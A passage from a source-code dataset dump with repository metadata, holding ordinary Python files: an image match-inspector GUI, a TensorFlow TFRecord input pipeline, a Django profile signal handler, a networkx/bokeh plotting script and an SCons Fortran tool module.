len(fpaths) > 0: fpath = fpaths[0] if not fpath.endswith('.jpg'): fpath += '.jpg' import vtool as vt vt.imwrite(fpath, render.image) def embed(self): match = self.match # NOQA import utool utool.embed() def _new_config_widget(self, cfg, changed=None): from wbia.guitool import PrefWidget2 user_mode = 0 cfg_widget = PrefWidget2.EditConfigWidget( config=cfg, user_mode=user_mode, parent=self, changed=changed ) return cfg_widget def closeEvent(self, event): from wbia.plottool import abstract_interaction abstract_interaction.unregister_interaction(self) super(MatchInspector, self).closeEvent(event) def _setup_configs(self, cfgdict=None): from vtool import matching import wbia.dtool # import pyhesaff # default_dict = pyhesaff.get_hesaff_default_params() # default_dict = vt.get_extract_features_default_params() TmpFeatConfig = wbia.dtool.from_param_info_list(matching.VSONE_FEAT_CONFIG) TmpNChipConfig = wbia.dtool.from_param_info_list(matching.NORM_CHIP_CONFIG) # [ # ut.ParamInfo(key, val) for key, val in default_dict.items() # # ut.ParamInfo('affine_invariance', True), # # ut.ParamInfo('rotation_invariance', False), # ]) self.featconfig = TmpFeatConfig() self.chipconfig = TmpNChipConfig() TmpVsOneConfig = wbia.dtool.from_param_info_list(matching.VSONE_DEFAULT_CONFIG) self.config = TmpVsOneConfig() self.disp_config = MatchDisplayConfig() if cfgdict is not None: print('[inspect_match] default cfgdict = %r' % (cfgdict,)) self.config.update(**cfgdict) self.featconfig.update(**cfgdict) self.chipconfig.update(**cfgdict) self.disp_config.update(**cfgdict) # Make config widgets after setting defaults self.chipconfig_widget = self._new_config_widget( self.chipconfig, changed=self.on_chip_cfg_changed ) self.featconfig_widget = self._new_config_widget( self.featconfig, changed=self.on_feat_cfg_changed ) self.config_widget = self._new_config_widget( self.config, changed=self.on_cfg_changed ) self.disp_config_widget = self._new_config_widget( self.disp_config, changed=self.on_cfg_changed ) def _setup_layout(self, autoupdate=True): from wbia.guitool.__PYQT__ import QtWidgets self.menubar = gt.newMenubar(self) self.menuFile = self.menubar.newMenu('Dev') self.menuFile.newAction(triggered=self.embed) self.menuFile.newAction(triggered=self.screenshot) splitter1 = self.addNewSplitter(orientation='horiz') config_vframe = splitter1.newWidget() splitter2 = splitter1.addNewSplitter(orientation='vert') config_vframe.addWidget(QtWidgets.QLabel('Chip Config')) config_vframe.addWidget(self.chipconfig_widget) config_vframe.addWidget(QtWidgets.QLabel('Feat Config')) config_vframe.addWidget(self.featconfig_widget) config_vframe.addWidget(QtWidgets.QLabel('Query Config')) config_vframe.addWidget(self.config_widget) config_vframe.addWidget(QtWidgets.QLabel('Display Config')) config_vframe.addWidget(self.disp_config_widget) # update_hframe = config_vframe.addNewWidget(orientation='horiz') # update_hframe.addNewButton('Update', pressed=self.update) self.autoupdate_cb = config_vframe.addNewCheckBox( 'auto-update', checked=autoupdate, changed=self.first_show ) self.mpl_widget = MatplotlibWidget(parent=self) splitter2.addWidget(self.mpl_widget) self.infobox = splitter2.addNewTextEdit() def execute_vsone(self): from vtool import matching print('[inspect_match] Execute vsone') cfgdict = {} cfgdict.update(self.featconfig.asdict()) cfgdict.update(self.chipconfig.asdict()) match = self.match match.verbose = True match._inplace_default = True matching.ensure_metadata_vsone(match.annot1, match.annot2, cfgdict=cfgdict) match_config = self.config.asdict() match.apply_all(match_config) def draw_pair(self): if self.match is None: return self.mpl_widget.clf() ax = self.mpl_widget.ax info_html = '' if self.info_text is not None: info_html = '<pre>' + self.info_text + '</pre>' self.infobox.setText(info_html) self.match.show(ax=ax, overlay=False) self.mpl_widget.fig.canvas.draw() def draw_vsone(self): match = self.match summary = match._make_local_summary_feature_vector(summary_ops={'sum'}) info_html = '' if self.info_text is not None: info_html = '<pre>' + self.info_text + '</pre>' feat_html = '<pre>' + ut.align(ub.repr2(summary), ':') + '</pre>' self.infobox.setText(info_html + feat_html) self.mpl_widget.clf() ax = self.mpl_widget.ax match.show(ax=ax, **self.disp_config) # fig.show() self.mpl_widget.fig.canvas.draw() def update(self, state=None): if self.autoupdate_cb.checkState() and self.match is not None: self.execute_vsone() self.draw_vsone() def on_cfg_changed(self, *args): self.update() self.cfg_needs_update = True def on_chip_cfg_changed(self, *args): print('Update feats') feat_keys = ['nchip', 'vecs', 'kpts', '_feats', 'flann'] self.match.annot1._mutable = True self.match.annot2._mutable = True for key in feat_keys: if key in self.match.annot1: del self.match.annot1[key] if key in self.match.annot2: del self.match.annot2[key] self.update() self.cfg_needs_update = True def on_feat_cfg_changed(self, *args): print('Update feats') feat_keys = ['vecs', 'kpts', '_feats', 'flann'] self.match.annot1._mutable = True self.match.annot2._mutable = True for key in feat_keys: if key in self.match.annot1: del self.match.annot1[key] if key in self.match.annot2: del self.match.annot2[key] self.update() self.cfg_needs_update = True def make_match_interaction(matches, metadata, type_='RAT+SV', **kwargs): import wbia.plottool.interact_matches # import wbia.plottool as pt fm, fs = matches[type_][0:2] try: H1 = metadata['H_' + type_.split('+')[0]] except Exception: H1 = None # fm, fs = matches['RAT'][0:2] annot1 = metadata['annot1'] annot2 = metadata['annot2'] rchip1, kpts1, vecs1 = ub.dict_take(annot1, ['nchip', 'kpts', 'vecs']) rchip2, kpts2, vecs2 = ub.dict_take(annot2, ['nchip', 'kpts', 'vecs']) # pt.show_chipmatch2(rchip1, rchip2, kpts1, kpts2, fm=fm, fs=fs) fsv = fs[:, None] interact = wbia.plottool.interact_matches.MatchInteraction2( rchip1, rchip2, kpts1, kpts2, fm, fs, fsv, vecs1, vecs2, H1=H1, **kwargs ) return interact def show_matching_dict(matches, metadata, *args, **kwargs): interact = make_match_interaction(matches, metadata, *args, **kwargs) interact.show_page() return interact if __name__ == '__main__': """ CommandLine: xdoctest -m vtool.inspect_matches """ import xdoctest xdoctest.doctest_module(__file__)
34.952756
96
0.619133
from __future__ import absolute_import, division, print_function import utool as ut import ubelt as ub try: import wbia.guitool as gt from wbia.guitool import mpl_widget INSPECT_BASE = gt.GuitoolWidget MatplotlibWidget = mpl_widget.MatplotlibWidget except (ImportError, TypeError): import warnings warnings.warn('WARNING: guitool not available') MatplotlibWidget = object INSPECT_BASE = object def lazy_test_annot(key): import numpy as np rchip_fpath = ut.grab_test_imgpath(key) annot = ut.LazyDict( { 'aid': key.split('.')[0], 'nid': key[0:4], 'rchip_fpath': rchip_fpath, 'gps': (np.nan, np.nan), 'yaw': np.nan, 'view': np.nan, 'qual': np.nan, 'time': np.nan, } ) return annot try: import wbia.dtool MatchDisplayConfig = wbia.dtool.from_param_info_list( [ ut.ParamInfo('overlay', True), ut.ParamInfo('show_all_kpts', False), ut.ParamInfo('mask_blend', 0.0, min_=0, max_=1), ut.ParamInfo('heatmask', True, hideif=':not overlay'), ut.ParamInfo('show_homog', False, hideif=':not overlay'), ut.ParamInfo('show_ori', False, hideif=':not overlay'), ut.ParamInfo('show_ell', False, hideif=':not overlay'), ut.ParamInfo('show_pts', False, hideif=':not overlay'), ut.ParamInfo('show_lines', False, hideif=lambda cfg: not cfg['overlay']), ut.ParamInfo('show_rect', False, hideif=':not overlay'), ut.ParamInfo('show_eig', False, hideif=':not overlay'), ut.ParamInfo('ell_alpha', 0.6, min_=0, max_=1, hideif=':not overlay'), ut.ParamInfo('line_alpha', 0.35, min_=0, max_=1, hideif=':not overlay'), ] ) except (ImportError, TypeError): pass class MatchInspector(INSPECT_BASE): def showEvent(self, event): super(MatchInspector, self).showEvent(event) self.first_show() def first_show(self, state=None): if self.match is not None: if self.autoupdate_cb.checkState(): self.update() else: self.draw_pair() def set_match(self, match=None, on_context=None, info_text=None): self.match = match self.info_text = info_text self.on_context = on_context if self.isVisible(): self.first_show() def initialize( self, match=None, on_context=None, autoupdate=True, info_text=None, cfgdict=None ): from wbia.plottool import abstract_interaction from wbia.guitool.__PYQT__ import QtCore self.set_match(match, on_context, info_text) self._setup_configs(cfgdict=cfgdict) self._setup_layout(autoupdate=autoupdate) abstract_interaction.register_interaction(self) self.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) self.customContextMenuRequested.connect(self.execContextMenu) def execContextMenu(self, qpoint): if self.on_context: options = self.on_context() else: options = [('No context set', None)] gt.popup_menu(self, qpoint, options) def screenshot(self): import wbia.plottool as pt with pt.RenderingContext() as render: self.match.show(**self.disp_config) fpaths = gt.newFileDialog('.', mode='save', exec_=True) if fpaths is not None and len(fpaths) > 0: fpath = fpaths[0] if not fpath.endswith('.jpg'): fpath += '.jpg' import vtool as vt vt.imwrite(fpath, render.image) def embed(self): match = self.match import utool utool.embed() def _new_config_widget(self, cfg, changed=None): from wbia.guitool import PrefWidget2 user_mode = 0 cfg_widget = PrefWidget2.EditConfigWidget( config=cfg, user_mode=user_mode, parent=self, changed=changed ) return cfg_widget def closeEvent(self, event): from wbia.plottool import abstract_interaction abstract_interaction.unregister_interaction(self) super(MatchInspector, self).closeEvent(event) def _setup_configs(self, cfgdict=None): from vtool import matching import wbia.dtool TmpFeatConfig = wbia.dtool.from_param_info_list(matching.VSONE_FEAT_CONFIG) TmpNChipConfig = wbia.dtool.from_param_info_list(matching.NORM_CHIP_CONFIG) TmpNChipConfig() TmpVsOneConfig = wbia.dtool.from_param_info_list(matching.VSONE_DEFAULT_CONFIG) self.config = TmpVsOneConfig() self.disp_config = MatchDisplayConfig() if cfgdict is not None: print('[inspect_match] default cfgdict = %r' % (cfgdict,)) self.config.update(**cfgdict) self.featconfig.update(**cfgdict) self.chipconfig.update(**cfgdict) self.disp_config.update(**cfgdict) self.chipconfig_widget = self._new_config_widget( self.chipconfig, changed=self.on_chip_cfg_changed ) self.featconfig_widget = self._new_config_widget( self.featconfig, changed=self.on_feat_cfg_changed ) self.config_widget = self._new_config_widget( self.config, changed=self.on_cfg_changed ) self.disp_config_widget = self._new_config_widget( self.disp_config, changed=self.on_cfg_changed ) def _setup_layout(self, autoupdate=True): from wbia.guitool.__PYQT__ import QtWidgets self.menubar = gt.newMenubar(self) self.menuFile = self.menubar.newMenu('Dev') self.menuFile.newAction(triggered=self.embed) self.menuFile.newAction(triggered=self.screenshot) splitter1 = self.addNewSplitter(orientation='horiz') config_vframe = splitter1.newWidget() splitter2 = splitter1.addNewSplitter(orientation='vert') config_vframe.addWidget(QtWidgets.QLabel('Chip Config')) config_vframe.addWidget(self.chipconfig_widget) config_vframe.addWidget(QtWidgets.QLabel('Feat Config')) config_vframe.addWidget(self.featconfig_widget) config_vframe.addWidget(QtWidgets.QLabel('Query Config')) config_vframe.addWidget(self.config_widget) config_vframe.addWidget(QtWidgets.QLabel('Display Config')) config_vframe.addWidget(self.disp_config_widget) self.autoupdate_cb = config_vframe.addNewCheckBox( 'auto-update', checked=autoupdate, changed=self.first_show ) self.mpl_widget = MatplotlibWidget(parent=self) splitter2.addWidget(self.mpl_widget) self.infobox = splitter2.addNewTextEdit() def execute_vsone(self): from vtool import matching print('[inspect_match] Execute vsone') cfgdict = {} cfgdict.update(self.featconfig.asdict()) cfgdict.update(self.chipconfig.asdict()) match = self.match match.verbose = True match._inplace_default = True matching.ensure_metadata_vsone(match.annot1, match.annot2, cfgdict=cfgdict) match_config = self.config.asdict() match.apply_all(match_config) def draw_pair(self): if self.match is None: return self.mpl_widget.clf() ax = self.mpl_widget.ax info_html = '' if self.info_text is not None: info_html = '<pre>' + self.info_text + '</pre>' self.infobox.setText(info_html) self.match.show(ax=ax, overlay=False) self.mpl_widget.fig.canvas.draw() def draw_vsone(self): match = self.match summary = match._make_local_summary_feature_vector(summary_ops={'sum'}) info_html = '' if self.info_text is not None: info_html = '<pre>' + self.info_text + '</pre>' feat_html = '<pre>' + ut.align(ub.repr2(summary), ':') + '</pre>' self.infobox.setText(info_html + feat_html) self.mpl_widget.clf() ax = self.mpl_widget.ax match.show(ax=ax, **self.disp_config) self.mpl_widget.fig.canvas.draw() def update(self, state=None): if self.autoupdate_cb.checkState() and self.match is not None: self.execute_vsone() self.draw_vsone() def on_cfg_changed(self, *args): self.update() self.cfg_needs_update = True def on_chip_cfg_changed(self, *args): print('Update feats') feat_keys = ['nchip', 'vecs', 'kpts', '_feats', 'flann'] self.match.annot1._mutable = True self.match.annot2._mutable = True for key in feat_keys: if key in self.match.annot1: del self.match.annot1[key] if key in self.match.annot2: del self.match.annot2[key] self.update() self.cfg_needs_update = True def on_feat_cfg_changed(self, *args): print('Update feats') feat_keys = ['vecs', 'kpts', '_feats', 'flann'] self.match.annot1._mutable = True self.match.annot2._mutable = True for key in feat_keys: if key in self.match.annot1: del self.match.annot1[key] if key in self.match.annot2: del self.match.annot2[key] self.update() self.cfg_needs_update = True def make_match_interaction(matches, metadata, type_='RAT+SV', **kwargs): import wbia.plottool.interact_matches fm, fs = matches[type_][0:2] try: H1 = metadata['H_' + type_.split('+')[0]] except Exception: H1 = None annot1 = metadata['annot1'] annot2 = metadata['annot2'] rchip1, kpts1, vecs1 = ub.dict_take(annot1, ['nchip', 'kpts', 'vecs']) rchip2, kpts2, vecs2 = ub.dict_take(annot2, ['nchip', 'kpts', 'vecs']) fsv = fs[:, None] interact = wbia.plottool.interact_matches.MatchInteraction2( rchip1, rchip2, kpts1, kpts2, fm, fs, fsv, vecs1, vecs2, H1=H1, **kwargs ) return interact def show_matching_dict(matches, metadata, *args, **kwargs): interact = make_match_interaction(matches, metadata, *args, **kwargs) interact.show_page() return interact if __name__ == '__main__': import xdoctest xdoctest.doctest_module(__file__)
true
true
f728e8ba0cf5f206c1d37e33dba1a29723c65385
5,237
py
Python
src/smart_compose/train/data_fn.py
StarWang/detext
66f071ec2cebf5e54e7d1de40936b5f281c2a69b
[ "BSD-2-Clause" ]
1,229
2020-02-07T22:17:47.000Z
2022-03-26T06:56:52.000Z
src/smart_compose/train/data_fn.py
StarWang/detext
66f071ec2cebf5e54e7d1de40936b5f281c2a69b
[ "BSD-2-Clause" ]
36
2020-04-10T02:00:20.000Z
2022-02-09T06:52:35.000Z
src/smart_compose/train/data_fn.py
StarWang/detext
66f071ec2cebf5e54e7d1de40936b5f281c2a69b
[ "BSD-2-Clause" ]
142
2020-04-07T01:04:07.000Z
2022-03-31T16:22:20.000Z
import tensorflow as tf from functools import partial from smart_compose.utils.parsing_utils import get_input_files, InputFtrType, iterate_items_with_list_val def _read_specified_features(inputs, feature_type2name): """Only reads in features specified in the DeText arguments""" required_inputs = {} for _, ftr_name_list in iterate_items_with_list_val(feature_type2name): for ftr_name in ftr_name_list: required_inputs[ftr_name] = inputs[ftr_name] return required_inputs _FTR_TYPE_TO_SCHEMA = { InputFtrType.TARGET_COLUMN_NAME: tf.io.FixedLenFeature(shape=[], dtype=tf.string) } def _get_tfrecord_feature_parsing_schema(feature_type_2_name: dict): """Returns parsing schema for input TFRecord :param feature_type_2_name: Features mapping from feature types to feature names """ ftr_name_2_schema = dict() for ftr_type, ftr_name_lst in iterate_items_with_list_val(feature_type_2_name): for ftr_name in ftr_name_lst: ftr_name_2_schema[ftr_name] = _FTR_TYPE_TO_SCHEMA[ftr_type] return ftr_name_2_schema def _cast_features_to_smaller_dtype(example, feature_type_2_names: dict): """Casts tensor to smaller storage dtype. int64 -> int32, float64 -> float32""" def _cast_to_dtype_of_smaller_size(t): if t.dtype == tf.int64: return tf.cast(t, dtype=tf.int32) elif t.dtype == tf.float64: return tf.cast(t, dtype=tf.float32) else: return t for ftr_type, ftr_name_lst in iterate_items_with_list_val(feature_type_2_names): for ftr_name in ftr_name_lst: example[ftr_name] = _cast_to_dtype_of_smaller_size(example[ftr_name]) return example _FTR_TYPE_TO_DENSE_DEFAULT_VAL = { InputFtrType.TARGET_COLUMN_NAME: '', } def input_fn_tfrecord(input_pattern, batch_size, mode, feature_type_2_name: dict, block_length=100, prefetch_size=tf.data.experimental.AUTOTUNE, num_parallel_calls=tf.data.experimental.AUTOTUNE, input_pipeline_context=None): """ Data input function for training given TFRecord """ output_buffer_size = 1000 input_files = get_input_files(input_pattern) feature_type_2_name = feature_type_2_name.copy() if len(input_files) > 1: # Multiple input files # Preprocess files concurrently, and interleave blocks of block_length records from each file dataset = tf.data.Dataset.from_tensor_slices(tf.constant(input_files)) # Shard input when using distributed training strategy if mode == tf.estimator.ModeKeys.TRAIN and input_pipeline_context and input_pipeline_context.num_input_pipelines > 1: dataset = dataset.shard(input_pipeline_context.num_input_pipelines, input_pipeline_context.input_pipeline_id) dataset = dataset.shuffle(buffer_size=len(input_files)) dataset = dataset.interleave(tf.data.TFRecordDataset, block_length=block_length, num_parallel_calls=num_parallel_calls) else: dataset = tf.data.TFRecordDataset(input_files[0]) # Parse and preprocess data dataset = tfrecord_transform_fn(dataset, batch_size, mode, feature_type_2_name, output_buffer_size, prefetch_size) return dataset def _split_features_and_labels(example, feature_type_2_name: dict): """Split inputs into two parts: features and label""" target_ftr_name = feature_type_2_name[InputFtrType.TARGET_COLUMN_NAME] labels = { target_ftr_name: example.pop(target_ftr_name) } return example, labels def tfrecord_transform_fn(dataset, batch_size, mode, feature_type_2_name, output_buffer_size, prefetch_size=tf.data.experimental.AUTOTUNE, num_parallel_calls=tf.data.experimental.AUTOTUNE): """ Preprocesses datasets including 1. dataset shuffling 2. record parsing 3. padding and batching """ if mode == tf.estimator.ModeKeys.TRAIN: dataset = dataset.shuffle(output_buffer_size) dataset = dataset.repeat() def _process_data(record, features_schema): example = tf.io.parse_single_example(serialized=record, features=features_schema) example = _cast_features_to_smaller_dtype(example, feature_type_2_name) features, labels = _split_features_and_labels(example, feature_type_2_name) return features, labels features_schema = _get_tfrecord_feature_parsing_schema(feature_type_2_name) dataset = dataset.map(partial(_process_data, features_schema=features_schema), num_parallel_calls=num_parallel_calls) dataset = (dataset .batch(batch_size, drop_remainder=True) .prefetch(prefetch_size)) return dataset
38.507353
125
0.665266
import tensorflow as tf from functools import partial from smart_compose.utils.parsing_utils import get_input_files, InputFtrType, iterate_items_with_list_val def _read_specified_features(inputs, feature_type2name): required_inputs = {} for _, ftr_name_list in iterate_items_with_list_val(feature_type2name): for ftr_name in ftr_name_list: required_inputs[ftr_name] = inputs[ftr_name] return required_inputs _FTR_TYPE_TO_SCHEMA = { InputFtrType.TARGET_COLUMN_NAME: tf.io.FixedLenFeature(shape=[], dtype=tf.string) } def _get_tfrecord_feature_parsing_schema(feature_type_2_name: dict): ftr_name_2_schema = dict() for ftr_type, ftr_name_lst in iterate_items_with_list_val(feature_type_2_name): for ftr_name in ftr_name_lst: ftr_name_2_schema[ftr_name] = _FTR_TYPE_TO_SCHEMA[ftr_type] return ftr_name_2_schema def _cast_features_to_smaller_dtype(example, feature_type_2_names: dict): def _cast_to_dtype_of_smaller_size(t): if t.dtype == tf.int64: return tf.cast(t, dtype=tf.int32) elif t.dtype == tf.float64: return tf.cast(t, dtype=tf.float32) else: return t for ftr_type, ftr_name_lst in iterate_items_with_list_val(feature_type_2_names): for ftr_name in ftr_name_lst: example[ftr_name] = _cast_to_dtype_of_smaller_size(example[ftr_name]) return example _FTR_TYPE_TO_DENSE_DEFAULT_VAL = { InputFtrType.TARGET_COLUMN_NAME: '', } def input_fn_tfrecord(input_pattern, batch_size, mode, feature_type_2_name: dict, block_length=100, prefetch_size=tf.data.experimental.AUTOTUNE, num_parallel_calls=tf.data.experimental.AUTOTUNE, input_pipeline_context=None): output_buffer_size = 1000 input_files = get_input_files(input_pattern) feature_type_2_name = feature_type_2_name.copy() if len(input_files) > 1: dataset = tf.data.Dataset.from_tensor_slices(tf.constant(input_files)) if mode == tf.estimator.ModeKeys.TRAIN and input_pipeline_context and input_pipeline_context.num_input_pipelines > 1: dataset = dataset.shard(input_pipeline_context.num_input_pipelines, input_pipeline_context.input_pipeline_id) dataset = dataset.shuffle(buffer_size=len(input_files)) dataset = dataset.interleave(tf.data.TFRecordDataset, block_length=block_length, num_parallel_calls=num_parallel_calls) else: dataset = tf.data.TFRecordDataset(input_files[0]) dataset = tfrecord_transform_fn(dataset, batch_size, mode, feature_type_2_name, output_buffer_size, prefetch_size) return dataset def _split_features_and_labels(example, feature_type_2_name: dict): target_ftr_name = feature_type_2_name[InputFtrType.TARGET_COLUMN_NAME] labels = { target_ftr_name: example.pop(target_ftr_name) } return example, labels def tfrecord_transform_fn(dataset, batch_size, mode, feature_type_2_name, output_buffer_size, prefetch_size=tf.data.experimental.AUTOTUNE, num_parallel_calls=tf.data.experimental.AUTOTUNE): if mode == tf.estimator.ModeKeys.TRAIN: dataset = dataset.shuffle(output_buffer_size) dataset = dataset.repeat() def _process_data(record, features_schema): example = tf.io.parse_single_example(serialized=record, features=features_schema) example = _cast_features_to_smaller_dtype(example, feature_type_2_name) features, labels = _split_features_and_labels(example, feature_type_2_name) return features, labels features_schema = _get_tfrecord_feature_parsing_schema(feature_type_2_name) dataset = dataset.map(partial(_process_data, features_schema=features_schema), num_parallel_calls=num_parallel_calls) dataset = (dataset .batch(batch_size, drop_remainder=True) .prefetch(prefetch_size)) return dataset
true
true
f728e961381abd978e448b0e9421310fa127c4d7
519
py
Python
app/users/signals.py
Nilsen11/django-training-CBV
b470fd1ea11df5d360389cbd24cac18c9383b8bd
[ "MIT" ]
null
null
null
app/users/signals.py
Nilsen11/django-training-CBV
b470fd1ea11df5d360389cbd24cac18c9383b8bd
[ "MIT" ]
null
null
null
app/users/signals.py
Nilsen11/django-training-CBV
b470fd1ea11df5d360389cbd24cac18c9383b8bd
[ "MIT" ]
null
null
null
from django.contrib.auth.models import User from django.db.models.signals import post_save from django.dispatch import receiver from .models import Profile # @receiver(post_save, sender=User) def create_profile(sender, instance, created, **kwargs): if created: Profile.objects.create(user=instance) # @receiver(post_save, sender=User) def save_profile(sender, instance, **kwargs): instance.profile.save() post_save.connect(create_profile, sender=User) post_save.connect(save_profile, sender=User)
25.95
56
0.776493
from django.contrib.auth.models import User from django.db.models.signals import post_save from django.dispatch import receiver from .models import Profile def create_profile(sender, instance, created, **kwargs): if created: Profile.objects.create(user=instance) def save_profile(sender, instance, **kwargs): instance.profile.save() post_save.connect(create_profile, sender=User) post_save.connect(save_profile, sender=User)
true
true
f728ea2eb644fbcc81d1cbb2f7e623c7f87f0380
834
py
Python
src/bokeh_app/graph_view.py
avbatchelor/insight-articles-project
852b338b786cb5b9c281fcec2e378aed8d3dc617
[ "MIT" ]
null
null
null
src/bokeh_app/graph_view.py
avbatchelor/insight-articles-project
852b338b786cb5b9c281fcec2e378aed8d3dc617
[ "MIT" ]
null
null
null
src/bokeh_app/graph_view.py
avbatchelor/insight-articles-project
852b338b786cb5b9c281fcec2e378aed8d3dc617
[ "MIT" ]
null
null
null
import networkx as nx import pickle from bokeh.io import show, output_file from bokeh.plotting import figure from bokeh.models.graphs import from_networkx processed_data_folder = 'C:\\Users\\Alex\\Documents\\GitHub\\insight-articles-project\\data\\processed\\' filename = processed_data_folder + 'graph_and_labels' with open (filename, 'rb') as fp: graph_mat, topic_labels = pickle.load(fp) G = nx.from_numpy_matrix(graph_mat) pos=nx.spring_layout(G) nx.relabel_nodes(G,topic_labels) nx.draw(G,pos) nx.draw_networkx_labels(G,pos,topic_labels,font_size=16) plot = figure(title="Blog Curator Demo", x_range=(-2.1,2.1), y_range=(-2.1,2.1), tools="", toolbar_location=None) graph = from_networkx(G, nx.spring_layout, scale=2, center=(0,0)) plot.renderers.append(graph) output_file("networkx_graph.html") show(plot)
29.785714
105
0.758993
import networkx as nx import pickle from bokeh.io import show, output_file from bokeh.plotting import figure from bokeh.models.graphs import from_networkx processed_data_folder = 'C:\\Users\\Alex\\Documents\\GitHub\\insight-articles-project\\data\\processed\\' filename = processed_data_folder + 'graph_and_labels' with open (filename, 'rb') as fp: graph_mat, topic_labels = pickle.load(fp) G = nx.from_numpy_matrix(graph_mat) pos=nx.spring_layout(G) nx.relabel_nodes(G,topic_labels) nx.draw(G,pos) nx.draw_networkx_labels(G,pos,topic_labels,font_size=16) plot = figure(title="Blog Curator Demo", x_range=(-2.1,2.1), y_range=(-2.1,2.1), tools="", toolbar_location=None) graph = from_networkx(G, nx.spring_layout, scale=2, center=(0,0)) plot.renderers.append(graph) output_file("networkx_graph.html") show(plot)
true
true
f728ed59d3b16b2ce2e1e501c09060a43e8d75f1
2,814
py
Python
cpp/src/tools/scons/scons-local-1.2.0.d20090223/SCons/Tool/ifl.py
nawien-sharma/keyczar
c55563bbd70f4b6fefc7444e296aab9894475f9a
[ "Apache-2.0" ]
30
2015-01-29T14:06:05.000Z
2022-01-10T07:47:29.000Z
cpp/src/tools/scons/scons-local-1.2.0.d20090223/SCons/Tool/ifl.py
nawien-sharma/keyczar
c55563bbd70f4b6fefc7444e296aab9894475f9a
[ "Apache-2.0" ]
1
2017-02-20T20:57:48.000Z
2018-12-19T23:44:38.000Z
cpp/src/tools/scons/scons-local-1.2.0.d20090223/SCons/Tool/ifl.py
nawien-sharma/keyczar
c55563bbd70f4b6fefc7444e296aab9894475f9a
[ "Apache-2.0" ]
15
2015-04-23T02:38:36.000Z
2021-03-01T20:09:39.000Z
"""SCons.Tool.ifl Tool-specific initialization for the Intel Fortran compiler. There normally shouldn't be any need to import this module directly. It will usually be imported through the generic SCons.Tool.Tool() selection method. """ # # Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "src/engine/SCons/Tool/ifl.py 4043 2009/02/23 09:06:45 scons" import SCons.Defaults from SCons.Scanner.Fortran import FortranScan from FortranCommon import add_all_to_env def generate(env): """Add Builders and construction variables for ifl to an Environment.""" fscan = FortranScan("FORTRANPATH") SCons.Tool.SourceFileScanner.add_scanner('.i', fscan) SCons.Tool.SourceFileScanner.add_scanner('.i90', fscan) if not env.has_key('FORTRANFILESUFFIXES'): env['FORTRANFILESUFFIXES'] = ['.i'] else: env['FORTRANFILESUFFIXES'].append('.i') if not env.has_key('F90FILESUFFIXES'): env['F90FILESUFFIXES'] = ['.i90'] else: env['F90FILESUFFIXES'].append('.i90') add_all_to_env(env) env['FORTRAN'] = 'ifl' env['SHFORTRAN'] = '$FORTRAN' env['FORTRANCOM'] = '$FORTRAN $FORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['FORTRANPPCOM'] = '$FORTRAN $FORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['SHFORTRANCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['SHFORTRANPPCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' def exists(env): return env.Detect('ifl') # Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
38.547945
121
0.730988
__revision__ = "src/engine/SCons/Tool/ifl.py 4043 2009/02/23 09:06:45 scons" import SCons.Defaults from SCons.Scanner.Fortran import FortranScan from FortranCommon import add_all_to_env def generate(env): fscan = FortranScan("FORTRANPATH") SCons.Tool.SourceFileScanner.add_scanner('.i', fscan) SCons.Tool.SourceFileScanner.add_scanner('.i90', fscan) if not env.has_key('FORTRANFILESUFFIXES'): env['FORTRANFILESUFFIXES'] = ['.i'] else: env['FORTRANFILESUFFIXES'].append('.i') if not env.has_key('F90FILESUFFIXES'): env['F90FILESUFFIXES'] = ['.i90'] else: env['F90FILESUFFIXES'].append('.i90') add_all_to_env(env) env['FORTRAN'] = 'ifl' env['SHFORTRAN'] = '$FORTRAN' env['FORTRANCOM'] = '$FORTRAN $FORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['FORTRANPPCOM'] = '$FORTRAN $FORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['SHFORTRANCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' env['SHFORTRANPPCOM'] = '$SHFORTRAN $SHFORTRANFLAGS $CPPFLAGS $_CPPDEFFLAGS $_FORTRANINCFLAGS /c $SOURCES /Fo$TARGET' def exists(env): return env.Detect('ifl')
true
true
f728ed8b115953ba9eb18572f31a9091b8aceb3d
10,194
py
Python
web/form/widgets.py
marcelb98/pycroft
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
[ "Apache-2.0" ]
null
null
null
web/form/widgets.py
marcelb98/pycroft
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
[ "Apache-2.0" ]
null
null
null
web/form/widgets.py
marcelb98/pycroft
34cc59d9ab7fdc0c20b09b4851111048a9f64d90
[ "Apache-2.0" ]
null
null
null
